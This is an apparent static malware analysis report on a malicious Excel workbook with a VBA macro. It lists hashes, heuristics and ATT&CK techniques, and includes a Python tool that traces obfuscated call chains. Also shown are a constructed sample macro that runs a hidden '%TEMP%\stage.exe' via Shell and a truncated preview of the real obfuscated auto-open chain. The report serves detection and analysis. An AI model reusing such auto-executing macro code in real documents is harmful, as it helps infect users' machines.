Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 18f461b274aa21fc…

MALICIOUS

Office (OLE)

Size: 436.5 KB
Created: 2017-07-30 22:24:35
Authoring application: Microsoft Excel
First seen: 2018-09-04
MD5: b012778c8d721f7cc4fe8147a4e62766
SHA-1: 15c6565ad447d78ab9ddc78ed9553a3df08ed918
SHA-256: 18f461b274aa21fc27491173968ebe87517795f24732ce977ccea5f627b116f9
Risk score: 188

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment
  • T1203 Exploitation for Client Execution

The file is a legacy OLE (Compound File Binary) Excel workbook that carries a VBA project. Its Workbook_Open handler is spelled WoRkBOOk_OPEN in the decoded source; VBA procedure names are case-insensitive, so the odd casing does not stop the handler from firing when the workbook is opened with macros enabled. The handler lives in a document module whose VB_Base GUID (00020819-0000-0000-C000-000000000046) is the Workbook class, i.e. the renamed ThisWorkbook module, and it does nothing but start a long chain of randomly named one-line procedures that each call the next. This call-chain obfuscation hides the real behaviour from keyword triage of the entry point, but the decoded source still contains a Shell() call and an Environ() call, which together indicate that the macro launches an external process and reads an environment variable (commonly used to locate a writable directory such as %TEMP%). Whether that process downloads a second stage cannot be confirmed from static analysis alone; the extracted macros.bas should be walked to its terminal procedure, or the sample detonated in a sandbox, before describing it as a downloader. The ClamAV detection Xls.Malware.Valyria-10036514-0 agrees with the static indicators. Note that none of the listed heuristics evidences a client-side exploit: execution depends on the victim enabling macros.

Heuristics (5)

  • ClamAV: Xls.Malware.Valyria-10036514-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware
  • VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): document contains VBA macro code
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
  • Workbook_Open macro (high, OLE_VBA_WBOPEN)
  • Environ() call, environment variable access (low, OLE_VBA_ENVIRON)
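The call-chain obfuscation summarised above can be unwound mechanically instead of by scrolling through the decoded source. The following Python script is an added example, not part of this report or of oletools: it parses VBA source into procedures, builds the call graph, walks it from the auto-open entry point (matched case-insensitively, which is why the WoRkBOOk_OPEN spelling does not matter) and reports the terminal procedure and the suspicious calls it contains, together with any procedures the chain never reaches. The embedded SAMPLE_VBA is a constructed imitation of the extracted macros.bas; its final procedure and the Shell command in it are invented for illustration and were not recovered from the real sample.

```python
"""Follow an obfuscated VBA call chain from its auto-open entry point.

Added example, not code from the analysed sample, the report, or oletools.
Procedures are recognised from 'Sub'/'Function' headers, calls only from the
explicit 'Call X' form used throughout the sample (bare 'X' calls are not
followed).
"""
import re

# Constructed sample in the style of the extracted macros.bas.  The last
# procedure and its Shell command are invented, not recovered from the sample.
SAMPLE_VBA = r'''
Attribute VB_Name = "Trueseeker"
Option Explicit
Static Sub WoRkBOOk_OPEN(): Call lrxfikrcmzhvxc: End Sub
Static Sub lrxfikrcmzhvxc()
Call ygqskkajezsgwv
End Sub
Function ygqskkajezsgwv() As Double
Call pegceghvvucalt
End Function
Private Sub pegceghvvucalt()
Dim p As String
p = Environ("TEMP") & "\stage.exe"
Shell p, vbHide
End Sub
Sub unused_helper()
Call ygqskkajezsgwv
End Sub
'''

PROC_RE = re.compile(
    r'^\s*(?:(?:Private|Public|Static|Friend)\s+)*(?:Sub|Function)\s+'
    r'([A-Za-z_]\w*)\s*\(', re.IGNORECASE)
END_RE = re.compile(r'^\s*End\s+(?:Sub|Function)\b', re.IGNORECASE)
CALL_RE = re.compile(r'\bCall\s+([A-Za-z_]\w*)', re.IGNORECASE)
# Auto-executing procedure names in Excel/Word, compared lowercase.
AUTO_OPEN = {'workbook_open', 'auto_open', 'document_open', 'autoopen'}
# Keywords worth flagging in the terminal procedure.
SUSPICIOUS = ('Shell', 'Environ', 'CreateObject', 'WScript.Shell')


def parse_procedures(src):
    """Return {lowercase name: body text} for every Sub/Function.

    One-line procedures ('Sub X(): Call Y: End Sub') are handled by splitting
    each line on ':'; a string literal containing ':' would confuse this
    shortcut, so a real tokenizer is needed for arbitrary macros.
    """
    procs, current, body = {}, None, []
    for raw in src.splitlines():
        for stmt in raw.split(':'):
            m = PROC_RE.match(stmt)
            if m:
                current, body = m.group(1).lower(), []
                continue
            if END_RE.match(stmt) and current:
                procs[current] = '\n'.join(body)
                current = None
                continue
            if current is not None:
                body.append(stmt.strip())
    return procs


def call_graph(procs):
    """Map each procedure to the set of known procedures it calls."""
    return {name: {c.lower() for c in CALL_RE.findall(body) if c.lower() in procs}
            for name, body in procs.items()}


def find_entry(procs):
    """First procedure whose name is an auto-execute handler, or None."""
    return next((n for n in procs if n in AUTO_OPEN), None)


def follow_chain(procs, start):
    """Walk single-successor links from start.  Stops at a procedure that
    branches, calls nothing, or loops back; returns the ordered chain."""
    graph = call_graph(procs)
    chain, seen, cur = [], set(), start
    while cur and cur not in seen:
        chain.append(cur)
        seen.add(cur)
        nxt = graph.get(cur, set())
        cur = next(iter(nxt)) if len(nxt) == 1 else None
    return chain


def suspicious_calls(body):
    """Keywords from SUSPICIOUS present in a procedure body, case-insensitive."""
    return [k for k in SUSPICIOUS
            if re.search(r'\b' + re.escape(k) + r'\b', body, re.IGNORECASE)]


def analyse(src):
    """Entry point, call chain, terminal procedure and its flags."""
    procs = parse_procedures(src)
    entry = find_entry(procs)
    if entry is None:
        return {'entry': None, 'chain': [], 'terminal': None,
                'flags': [], 'orphans': sorted(procs)}
    chain = follow_chain(procs, entry)
    terminal = chain[-1]
    return {'entry': entry, 'chain': chain, 'terminal': terminal,
            'flags': suspicious_calls(procs[terminal]),
            'orphans': sorted(n for n in procs if n not in chain)}


if __name__ == '__main__':
    r = analyse(SAMPLE_VBA)
    print(f"{r['entry']} -> {len(r['chain']) - 1} hops -> {r['terminal']}: "
          f"{r['flags']}; unreached: {r['orphans']}")
```

Against the real artifact, analyse(open('macros.bas', encoding='latin-1').read()) should produce a chain of dozens of hops from workbook_open to a procedure flagged with Shell and Environ, which is exactly what the OLE_VBA_WBOPEN, OLE_VBA_SHELL and OLE_VBA_ENVIRON heuristics predict. Anything listed under orphans is either dead code or reached through a construct the walker does not model (a bare call without the Call keyword, Application.Run, or a string-built name), and deserves a manual look rather than being dismissed.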

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 150678 bytes
SHA-256: cbd67b2fe3c9099b7571b7bf2b3b5d53c0aea67063e53491e82223e0adb7ca46

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "Trueseeker1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Trueseeker"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Static Sub WoRkBOOk_OPEN(): Call lrxfikrcmzhvxc: End Sub
Static Sub lrxfikrcmzhvxc()
Call ygqskkajezsgwv
End Sub
Function ygqskkajezsgwv() As Double
Call pegceghvvucalt
End Function
Static Function pegceghvvucalt() As Integer
Call hiwcsbxglkjuok
End Function
Private Function hiwcsbxglkjuok() As Double
Call rljxjeybprakdn
End Function
Sub rljxjeybprakdn()
Call suqgjpexxttpxf
End Sub
Static Function suqgjpexxttpxf() As Boolean
Call gpijfpxdpozbkq
End Function
Private Sub gpijfpxdpozbkq()
Call jcrgozbgfcsqps
End Sub
Private Sub jcrgozbgfcsqps()
Call zweczwjmoldzsf
End Sub
Private Sub zweczwjmoldzsf()
Call vldrmnxqblhxcd
End Sub
Function vldrmnxqblhxcd() As Long
Call fcxmkqdrthkdqc
End Function
Static Sub fcxmkqdrthkdqc()
Call mpxxywkstwmlzh
End Sub
Sub mpxxywkstwmlzh()
Call plodtgkbxevnom
End Sub
Static Sub plodtgkbxevnom()
Call ztbpfjuwaghfrj
End Sub
Private Function ztbpfjuwaghfrj() As Byte
Call msbltjyjhbifbe
End Function
Private Sub msbltjyjhbifbe()
Call yerjnkijspugpm
End Sub
Static Function yerjnkijspugpm() As Date
Call grhrcppdbyxbsa
End Function
Function grhrcppdbyxbsa() As String
Call wsnfhjaqmkghcp
End Function
Static Function wsnfhjaqmkghcp() As Long
Call foptynrytgdakx
End Function
Sub foptynrytgdakx()
Call wzvgxkdxouyuei
End Sub
Static Function wzvgxkdxouyuei() As String
Call xzugkvonibblow
End Function
Static Sub xzugkvonibblow()
Call rgnuhpdfgehpcy
End Sub
Static Sub rgnuhpdfgehpcy()
Call wyrbzwggnzabkv
End Sub
Sub wyrbzwggnzabkv()
Call rjmcepvesoepji
End Sub
Private Sub rjmcepvesoepji()
Call flqlbnzyhvfzdo
End Sub
Function flqlbnzyhvfzdo() As Object
Call txbekmxykwvxix
End Function
Function txbekmxykwvxix() As Variant
Call vlgeeymurtkcph
End Function
Private Function vlgeeymurtkcph() As Single
Call uvstolerhizktx
End Function
Private Sub uvstolerhizktx()
Call vzzmvxzoqowoyv
End Sub
Static Function vzzmvxzoqowoyv() As Byte
Call xfycciudjrvfwc
End Function
Sub xfycciudjrvfwc()
Call cbkcnqimfmieai
End Sub
Sub cbkcnqimfmieai()
Call gkmgdachfbggjb
End Sub
Private Function gkmgdachfbggjb() As Boolean
Call ngtadgepujzcci
End Function
Private Sub ngtadgepujzcci()
Call jqjvywinslinrx
End Sub
Private Sub jqjvywinslinrx()
Call rucwzbuiefuhrz
End Sub
Function rucwzbuiefuhrz() As Object
Call zctovgqdotcbfu
End Function
Private Function zctovgqdotcbfu() As Currency
Call hvnijljacywuck
End Function
Private Sub hvnijljacywuck()
Call szsabninqaoxkx
End Sub
Static Function szsabninqaoxkx() As Date
Call wzmufwhdcvwkkn
End Function
Static Function wzmufwhdcvwkkn() As Date
Call ihuagxgwxknydl
End Function
Function ihuagxgwxknydl() As Double
Call phjnzetlbsaisc
End Function
Static Function phjnzetlbsaisc() As Byte
Call uqflflcgutdgqw
End Function
Function uqflflcgutdgqw() As Double
Call vmbxkxnqgohmpz
End Function
Private Sub vmbxkxnqgohmpz()
Call muzrqupildiuna
End Sub
Private Sub muzrqupildiuna()
Call fvsotoubklrxnj
End Sub
Private Function fvsotoubklrxnj() As Variant
Call yydjxhzltodofb
End Function
Static Function yydjxhzltodofb() As Boolean
Call ccfwtqjiuhfoab
End Function
Static Function ccfwtqjiuhfoab() As Object
Call xjtdfinzkxppde
End Function
Function xjtdfinzkxppde() As Single
Call wcmccwzcofulrx
End Function
Static Function wcmccwzcofulrx() As Long
Call sutkhoyorgsxwe
End Function
Sub sutkhoyorgsxwe()
Call kkshqijmdcopuj
End Sub
Sub kkshqijmdcopuj()
Call r
... (truncated)